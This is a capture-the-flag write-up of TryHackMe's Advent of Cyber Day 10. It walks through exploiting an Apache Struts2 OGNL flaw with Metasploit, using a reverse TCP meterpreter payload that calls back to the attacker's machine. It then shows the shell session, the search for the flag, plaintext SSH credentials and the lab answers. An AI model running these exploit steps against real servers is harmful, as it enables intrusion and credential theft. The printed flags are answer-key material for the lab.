Navigate back to the homepage

Advent of Cyber Day 10 Metasploit-a-ho-ho-ho

Ludovic COULON
May 8th, 2020 · 1 min read

TryHackMe | Advent of Cyber

Hi Lindsey here. I’ve been a great Elf all year, but there was one incident and now I think I’m on Santa’s naughty list.

What? You didn’t think us elves got presents too? Well we do and we get first pick of the pressies!

Can you help me hack into Santa’s system that keeps track of the naughty and nice people to see if I am on it?

blog_image

Check out the blog post shown above to help you on this task.

Setup

On the title of this box it says “Struts”, so I search if there is some exploits in the metasploit framework and spoiler alert there is one.

blog_image

Now that we have the exploit let’s use it !

1use exploit/multi/http/struts2_content_type_ognl

Now put the correct HOST and port for the exploit

1set RHOSTS 10.10.21.228 # Host of the target box
2set RPORT 80 # There is no SSL (https)
3set TARGETURI /showcase.action # The path to a struts application action (default path)

Now the fun stuff, the reverse tcp meterpreter :)

1use linux/x86/meterpreter/reverse_tcp
2set LHOST IP # Ip of your kali machine (openvpn ip)
3set LPORT 4444 # You can put anything there.

After all the configuration you need to go back to the previous exploit (struts2)

1use multi/http/struts2_content_type_ognl
2set PAYLOAD linux/x86/meterpreter/reverse_tcp # Link the reverse TCP to the struts exploit)
3exploit

1 Compromise the web server using Metasploit. What is flag1?

On the question we have the name of the flag so let’s find it !

1meterpreter > shell
2Process 63 created.
3Channel 6 created.
4find / | grep -i "flag1"
5/usr/local/tomcat/webapps/ROOT/ThisIsFlag1.txt
6^C
7Terminate channel 6? [y/N]  y
8meterpreter > cat /usr/local/tomcat/webapps/ROOT/ThisIsFlag1.txt
9THM{3ad96bb13ec963a5ca4cb99302b37e12}
blog_image
1THM{3ad96bb13ec963a5ca4cb99302b37e12} # flag

2 Now you’ve compromised the web server, get onto the main system. What is Santa’s SSH password?

On the question we have the name ‘santa’ let’s see if there is some users on the /home directory

1meterpreter > "cd /home"
2meterpreter > "ls"
3Listing: /home
4==============
5
6Mode             Size  Type  Last modified              Name
7----             ----  ----  -------------              ----
840755/rwxr-xr-x  4096  dir   2019-12-08 16:12:45 -0500  santa
9
10meterpreter > "cd santa"
11meterpreter > ls
12Listing: /home/santa
13====================
14
15Mode              Size  Type  Last modified              Name
16----              ----  ----  -------------              ----
17100644/rw-r--r--  30    fil   2019-12-08 16:12:44 -0500  "ssh-creds.txt"
18
19meterpreter > "cat ssh-creds.txt"
20santa:rudolphrednosedreindeer
1rudolphrednosedreindeer # flag

3 Who is on line 148 of the naughty list?

Now that we have the ssh creds on the santa’s accont let’s use it !

1ssh santa@10.10.21.228
2password: rudolphrednosedreindeer

How to “grep” out specific line ranges of a file

1[santa@ip-10-10-21-228 ~]$ sed '148!d' naughty_list.txt
2Melisa Vanhoose

4 Who is on line 52 of the nice list?

1[santa@ip-10-10-21-228 ~]$ sed '52!d' nice_list.txt
2Lindsey Gaffney

More articles from Ludovic COULON

RP Metasploit - TryHackMe

RP: Metasploit - TryHackMe writeup

May 8th, 2020 · 8 min read

RP PS Empire - TryHackMe

RP: PS Empire - TryHackMe writeup

May 8th, 2020 · 3 min read
© 2020 Ludovic COULON
Link to $https://github.com/LasCCLink to $https://www.linkedin.com/in/ludovic-coulon-b361ba183/Link to $https://www.youtube.com/channel/UCkDvlI9LUuwZ4GKFUbP_OvgLink to $mailto:coulonludovicc@gmail.com
063664e4.js" async="">cab29.js" async="">4 14" fill="none" xmlns="http://www.w3.org/2000/svg">Link to $https://github.com/LasCCLink to $https://www.linkedin.com/in/ludovic-coulon-b361ba183/Link to $https://www.youtube.com/channel/UCkDvlI9LUuwZ4GKFUbP_OvgLink to $mailto:coulonludovicc@gmail.com